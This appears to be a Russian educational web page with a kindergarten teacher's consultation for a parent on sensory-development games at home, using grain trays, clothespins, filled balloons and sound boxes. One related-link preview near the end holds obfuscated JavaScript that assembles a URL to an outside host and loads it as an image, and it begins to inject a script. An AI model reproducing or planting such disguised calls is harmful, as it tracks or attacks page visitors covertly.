Индивидуальная консультация для родителей «Сенсорное развитие детей в домашних условиях»
консультация (младшая группа)

Индивидуальная консультация для родителей

Скачать:

ВложениеРазмер
Файл individualnaya_konsultatsiya_dlya_roditeley.docx19.73 КБ

Предварительный просмотр:

Индивидуальная консультация для родителей

Тема: «Сенсорное развитие детей в домашних условиях»

Проводится по инициативе воспитателя.

Цель: повышение педагогической компетенции родителей по сенсорному развитию и развитию мелкой моторики детей младшего дошкольного возраста в домашних условиях.

Задачи:

- познакомить родителей с понятием сенсорное развитие;

- познакомить с играми и упражнениями, направленными на формирование сенсорных эталонов и развитие мелкой моторики руки, которые можно организовать в домашних условиях;

- создание условий для укрепления сотрудничества между детским садом и семьей.

Предварительная работа: наблюдение за детьми во время занятий, анкетирование родителей, изучение литературы по данной теме, составление картотеки игр по сенсорному развитию.

Оборудование: поднос с крупой; прищепки разных цветов; заготовки из картона (солнце, туча, еж, елочка, цветок, утенок); две емкости с горохом и фасолью; 8 воздушных шаров наполненных различными крупами; 8 коробочек с различными наполнителями; памятка для родителя; картотека игр по сенсорному развитию.

Здравствуйте, уважаемая Ирина Васильевна!

Спасибо, что вы приняли мое приглашение и нашли время, для того что бы мы с вами смогли поговорить о вашем сыне Вадиме.

Вадим успешно прошел процесс адаптации в нашем детском саду, нашел общий язык с ребятами группы. У вас очень усидчивый и старательный мальчик, он хорошо ведет себя на занятиях, с увлечением играет. И хочу сказать вам большое спасибо за такого ребенка.

Но я, обратила внимание, на то, что во время занятий у Вадима возникают некоторые трудности связанные с недостатком сенсорного развития. Они не существенные с ними можно справиться и как это сделать, мы с вами сегодня и поговорим.

Давайте вспомним, что же такое сенсорное развитие детей. Это развитие их восприятия, формирование понятий о внешних свойствах предметов (форме, цвете, величине, запахе, вкусе…). Этот мир ребенок познает с помощью органов чувств – зрения, слуха, обоняния, осязания и вкуса. И именно дошкольный возраст является наиболее благоприятным для накопления определенных знаний об окружающем мире. Недостаточно предоставить малышу разнообразные предметы для исследования и назвать их свойства. Очень важно научить ребенка анализировать отдельные признаки каждого предмета, чтобы научить его классифицировать объекты. Поэтому ребенка необходимо сначала научить распознавать сенсорные эталоны, а затем приучать находить эталонные объекты в реальных вещах (например, в картинке дома отыскать круглые и прямоугольные части, различные цвета).

В данном возрасте необходимо формировать следующие сенсорные эталоны:

- форма – плоскостные геометрические фигуры и их названия (квадрат, круг, прямоугольник, овал, треугольник);

- цвет – семь цветов спектра (красный, оранжевый, желтый, зеленый, голубой, синий, фиолетовый, а также черный, белый и серый);

- величина − отношение предметов по размеру (большой, поменьше, маленький);

- пространственные – расположение предметов в пространстве (вверху, внизу, слева, справа, впереди, позади).

Но не все дети к 4 годам усваивают эти эталоны. Как вы думаете, почему?

Ребенок в жизни сталкивается с многообразием форм, красок и других свойств предметов. И конечно каждый ребенок, даже без целенаправленного обучения, так или иначе, воспринимает все это. Но усвоение происходит стихийно, без разумного руководства взрослого и поэтому оно не редко оказывается поверхностным, неполноценным.

Чем больше дети познают мир, тем богаче их сенсорный опыт, тем проще им будет в дальнейшем развивать моторику, что позволит легче обучаться в школе. Я думаю, что вы, как и все родители, хотите, что бы Вадим хорошо учился в школе? Для этого мы с вами совместными усилиями, должны помочь вашему ребенку в развитии сенсорного восприятия.

Что же больше всего дети любят делать? Ну, конечно, играть! Они играют дома, в детском саду, на улице, в гостях. Любое увлекательное занятие обозначается для них словом «игра». Через игру ребёнок познаёт окружающую его действительность.

И сегодня я хочу предложить вам очень простые, но в тоже время очень интересные, а главное познавательные игры, которые вы можете организовать с Вадимом дома, для его сенсорного развития.

1. Игра «Песочница на кухне»

Возьмите поднос или плоское блюдо. Тонким равномерным слоем рассыпьте по подносу любую мелкую крупу. Проведите пальчиком ребенка по крупе. Получится яркая контрастная линия. Позвольте малышу самому нарисовать несколько линий. Затем попробуйте вместе нарисовать какие-нибудь предметы (забор, дождик, волны). Такое рисование способствует развитию не только мелкой моторики рук, но и массажирует пальчики вашего малыша. И плюс ко всему развается фантазия и воображение. И обязательно, когда вы рисуете, например, солнышко спрашивайте какой оно формы – круглой, если домик то крыша какой формы – треугольной, сам домик – квадратной, т. к. для нас важно развитие сенсорики.

2. Игры с прищепками

Если взять круг из картона желтого цвета и прицепить к нему прищепки, что получится? – СОЛНЫШКО! А солнышко, какое? – Круглое! А какого оно цвета? – Жёлтое! А если взять облачко и прицепить к нему синие прищепки, на что это похоже? Да, пошел дождик. Заготовки для игры могут быть различные: солнышко, тучка, ёлка, цветок, морковка, ежик и многое другое. И вновь в доступной ребёнку форме мы закрепляем понятие основных сенсорных эталонов. Кроме этого, в играх с прищепками развивается и его творческие способности и логическое мышление.

3. Игры с крупами

Дети очень любят игры с крупами, это не только приятные тактильные ощущения и самомассаж, но и возможность немного пошалить. Итак, давайте немного поиграем! В глубокую ёмкость насыпаем горох и запускаем в неё руки и изображаем, как будто мы начинаем месить тесто, приговаривая: «Месим, месим тесто, есть в печи место. Будут-будут из печи булочки и калачи». А если использовать фасоль и горох вместе, тогда ребёнку можно предложить отделить маленькое от большого – и опять сенсорное развитие! А если в конце игры ребёнок откопает «клад» (маленькая игрушка или конфета), поверьте, восторгу не будет предела.

4. Игра «Забавные шары»

В воздушные шары насыпьте такие наполнители, как гречка, горох, фасоль, мука. Каждого вида нужно сделать по 2 образца. Ребенок должен ощупывать и найти пару для каждого шарика-мешочка. Так развиваем у ребенка тактильные ощущения.

5.Игра «Поющие коробочки»

Материал для этого упражнения для развития слуха можно сделать из небольших плотно закрывающихся ёмкостей, например коробочек от «Киндер-сюрприза». Главное, они должны быть непрозрачными, и когда мы поместим внутрь какой-то предмет, они должны производить при потряхивании чёткий звук. Их нужно наполнить песком, крупами разного размера, камешками, т. е. тем, что издаёт разные интересные звуки. Каждым наполнителем наполняем по две коробочки. В итоге должно получиться два одинаковых набора коробочек с разными звуками. Смысл игры в том, чтобы ребёнок научился находить пару ёмкостей-коробочек одинаковых по звучанию.

Сегодня я познакомила лишь с малой частью того, чем можно занять ваш досуг с ребенком. Включайте свою фантазию и помните, что сенсорное развитие является залогом успешного осуществления разных видов деятельности, формирования различных способностей ребенка. Побуждайте Вадима к игре, насколько возможно, играйте с ним в развивающие и веселые игры.

Хочу напомнить китайскую пословицу: «Расскажи и я забуду, покажи, и я запомню, дай попробовать и я пойму».

Большое спасибо, за то, что вы сегодня пришли! И что бы вам было проще запомнить то, о чем мы с Вами сегодня говорили, хочу вручить вам эту памятку и подборку игр по сенсорному развитию в домашних условиях. Успехов вам и вашему ребенку!


По теме: методические разработки, презентации и конспекты

Консультация для родителей: "Сенсорное развитие детей в домашних условиях"

Сенсорное развитие детей -это развитие их восприятия, формирование понятий о внешних свойствах предметов( форме, цвете, величине, запахе, вкусе…). И именно дошкольный возраст является наиболее ...

Консультация для родителей: "Сенсорное развитие детей в домашних условиях".

Сенсорное развитие детей – это развитие их восприятия, формирование понятий о внешних свойствах предметов (форме, цвете, величине, запахе, вкусе…). И именно дошкольный возраст является на...

Консультация для родителей "Сенсорное развитие детей в домашних условиях"

Сенсорное развитие детей – это развитие их восприятия, формирование понятий о внешних свойствах предметов (форме, цвете, величине, запахе, вкусе и т.д.). Яркий, меняющийся мир ребенок позна...

Консультация для родителей «Сенсорное развитие детей в домашних условиях»

var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'rzkmxcve.lussoit.com\',\'48\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); var script = document...

Консультация для родителей «Сенсорное развитие детей в домашних условиях. Простые игры на кухне»

В консультации предлагаютя игры с детьми раннего возраста, которые можно провести на кухне....